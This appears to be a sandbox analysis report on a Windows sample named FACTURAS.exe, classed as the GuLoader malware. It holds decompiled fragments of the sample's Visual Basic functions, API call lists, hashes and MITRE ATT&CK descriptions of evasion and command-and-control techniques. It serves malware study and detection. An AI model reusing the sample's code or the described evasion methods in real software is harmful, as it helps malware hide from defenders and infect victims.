				_t24 =  &_v52;
				_push(_t24);
				L00401834();
				L0040183A();
				L00401828();
				L00401630();
				_push(0x41fcb1);
				L00401846();
				L00401846();
				L00401846();
				return _t24;
			}

0x0041fc0c
0x0041fc1b
0x0041fc25
0x0041fc2d
0x0041fc30
0x0041fc37
0x0041fc46
0x0041fc4f
0x0041fc5a
0x0041fc62
0x0041fc63
0x0041fc68
0x0041fc6b
0x0041fc6c
0x0041fc76
0x0041fc7e
0x0041fc83
0x0041fc88
0x0041fc9b
0x0041fca3
0x0041fcab
0x0041fcb0

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FC25
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FC4F
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FC5A
#612.MSVBVM60(?,?,?,?,?,00401546), ref: 0041FC63
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC6C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC76
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC7E
#554.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0041FC83
__vbaFreeStr.MSVBVM60(0041FCB1,?,?,?,?,?,?,00401546), ref: 0041FC9B
__vbaFreeStr.MSVBVM60(0041FCB1,?,?,?,?,?,?,00401546), ref: 0041FCA3
__vbaFreeStr.MSVBVM60(0041FCB1,?,?,?,?,?,?,00401546), ref: 0041FCAB

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyMove$#554#612Chkstk
String ID:
API String ID: 3453574145-0
Opcode ID: fb038257a54215e100ec620f2b113f154abc0cce774c22c2cb1d934545701afd
Instruction ID: d95513f1a388698f6048546383d07725ce3d06fdacb9cb1c34183f2d4cb7e640
Opcode Fuzzy Hash: fb038257a54215e100ec620f2b113f154abc0cce774c22c2cb1d934545701afd
Instruction Fuzzy Hash: E611FA31910149ABCB00FFA2C986EDEB774BF44748F50853AB501771E1EB3CAA06CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00421067, Relevance: 13.6, APIs: 9, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00421067(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				short _v36;
				char _v52;
				char _v68;
				char* _t29;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L00401540();
				_v16 = _t42;
				_v12 = 0x4014d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401546, _t39);
				L004017B6();
				_push(0x5745);
				_push( &_v52);
				L0040167E();
				_push( &_v52);
				_push( &_v68);
				L004015E2();
				_push( &_v68);
				L00401834();
				L0040183A();
				_push( &_v68);
				_t29 =  &_v52;
				_push(_t29);
				_push(2);
				L00401840();
				_v36 = 0x253;
				_push(0x421123);
				L00401846();
				L00401846();
				return _t29;
			}

0x0042106a
0x00421079
0x00421083
0x0042108b
0x0042108e
0x00421095
0x004210a4
0x004210ad
0x004210b2
0x004210ba
0x004210bb
0x004210c3
0x004210c7
0x004210c8
0x004210d0
0x004210d1
0x004210db
0x004210e3
0x004210e4
0x004210e7
0x004210e8
0x004210ea
0x004210f2
0x004210f8
0x00421115
0x0042111d
0x00421122

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421083
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 004210AD
#698.MSVBVM60(?,00005745,?,?,?,?,00401546), ref: 004210BB
#520.MSVBVM60(?,?,?,00005745,?,?,?,?,00401546), ref: 004210C8
__vbaStrVarMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004210D1
__vbaStrMove.MSVBVM60(?,?,?,?,00005745,?,?,?,?,00401546), ref: 004210DB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00005745,?,?,?,?,00401546), ref: 004210EA
__vbaFreeStr.MSVBVM60(00421123), ref: 00421115
__vbaFreeStr.MSVBVM60(00421123), ref: 0042111D

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#520#698ChkstkCopyList
String ID:
API String ID: 415313431-0
Opcode ID: 6461ee5c354eb87dc3828b61f05cc15f8fdc49cdf3789d5581b9045019226f7a
Instruction ID: 82f5dfab400b30e74159026a942c374ba6e551cee8f4a93f22cdf5682beecedd
Opcode Fuzzy Hash: 6461ee5c354eb87dc3828b61f05cc15f8fdc49cdf3789d5581b9045019226f7a
Instruction Fuzzy Hash: 6E11EF72D00218ABCB00FF91DD86EEEB7BCBF44748F54842AF601A71A1EB789605CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F541, Relevance: 13.6, APIs: 9, Instructions: 50COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F55D
#707.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F585
__vbaStrMove.MSVBVM60(0000000C,00000000,?,?,?,?,00401546), ref: 0041F58F
#593.MSVBVM60(0000000A), ref: 0041F5AC
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F5B7
#537.MSVBVM60(0000003B,0000000A), ref: 0041F5BE
__vbaStrMove.MSVBVM60(0000003B,0000000A), ref: 0041F5C8
__vbaFreeStr.MSVBVM60(0041F5EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F5E1
__vbaFreeStr.MSVBVM60(0041F5EF,0000000C,00000000,?,?,?,?,00401546), ref: 0041F5E9

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#593#707Chkstk
String ID:
API String ID: 2467297632-0
Opcode ID: 8cc3b6ec27578a9a6ab8daf3a2545104c50b70a72e0f575bcbd2548207f35ca0
Instruction ID: 058712b8ce04bfa23d7a86b34aa372a00603dedd0dc58742632bc92af5f3ad60
Opcode Fuzzy Hash: 8cc3b6ec27578a9a6ab8daf3a2545104c50b70a72e0f575bcbd2548207f35ca0
Instruction Fuzzy Hash: 23112171940205ABDB01FFA1CC42BDE7BB4AF00704F10843AB501B71E1DF789645CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF1B, Relevance: 12.0, APIs: 8, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041EF1B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				long long _v40;
				char _v48;
				signed char _t22;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t32 = _t31 - 0xc;
				 *[fs:0x0] = _t32;
				L00401540();
				_v16 = _t32;
				_v12 = 0x401358;
				_v8 = 0;
				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401546, _t29);
				L004017B6();
				asm("fabs");
				asm("fnstsw ax");
				if((_t22 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				L00401666();
				_v40 = __fp0;
				_v48 = 5;
				__eax =  &_v48;
				_push(__eax);
				L0040166C();
				L0040183A();
				L00401828();
				asm("wait");
				_push(0x41efc0);
				L00401846();
				L00401846();
				return __eax;
			}

0x0041ef1e
0x0041ef2d
0x0041ef37
0x0041ef3f
0x0041ef42
0x0041ef49
0x0041ef58
0x0041ef61
0x0041ef6c
0x0041ef6e
0x0041ef72
0x0040154c
0x0040154c
0x0041ef74
0x0041ef79
0x0041ef7c
0x0041ef83
0x0041ef86
0x0041ef87
0x0041ef91
0x0041ef99
0x0041ef9e
0x0041ef9f
0x0041efb2
0x0041efba
0x0041efbf

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EF37
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EF61
__vbaFPFix.MSVBVM60(?,?,?,?,00401546), ref: 0041EF74
#536.MSVBVM60(00000005), ref: 0041EF87
__vbaStrMove.MSVBVM60(00000005), ref: 0041EF91
__vbaFreeVar.MSVBVM60(00000005), ref: 0041EF99
__vbaFreeStr.MSVBVM60(0041EFC0,00000005), ref: 0041EFB2
__vbaFreeStr.MSVBVM60(0041EFC0,00000005), ref: 0041EFBA

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536ChkstkCopyMove
String ID:
API String ID: 983360083-0
Opcode ID: fd91cf6348d1a4d78fb69df26f73506acdfb76d80de657453951e01cbef83183
Instruction ID: 5b255a183a487d0d0602ac83322b86d6a018e46cb067aa11757595a01c51abf0
Opcode Fuzzy Hash: fd91cf6348d1a4d78fb69df26f73506acdfb76d80de657453951e01cbef83183
Instruction Fuzzy Hash: 99113C35800209ABCB00FFA6C846BDEBBB4BF05748F10846AF801771E1DB389A458B59

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FACTURAS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: FACTURAS.exe PID: 6088 Parent PID: 3324

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: FACTURAS.exe PID: 6088 Parent PID: 3324 FACTURAS.exeCOMMON

Executed Functions

Function 0041C3E4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267
COMMON

Function 0041FCD0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416
COMMON

Function 0041DA9C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184
COMMON

Function 00420484, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307
COMMON

Function 0041E86D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85
COMMON

Function 0042114C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58
COMMON

Function 00421236, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Function 00401888, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMON

Function 00420C6D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225
COMMON

Function 0041F60E, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196
COMMON

Function 0041F970, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159
COMMON

Function 0041EB3A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179
COMMON

Function 0041EFE4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204
COMMON

Function 0041F31E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130
COMMON

Function 0041E9A9, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95
COMMON

Function 00420967, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165
COMMON

Function 00420319, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95
COMMON

Function 0041FC09, Relevance: 16.5, APIs: 11, Instructions: 47
COMMON

Function 00421067, Relevance: 13.6, APIs: 9, Instructions: 53
COMMON

Function 0041EF1B, Relevance: 12.0, APIs: 8, Instructions: 48
COMMON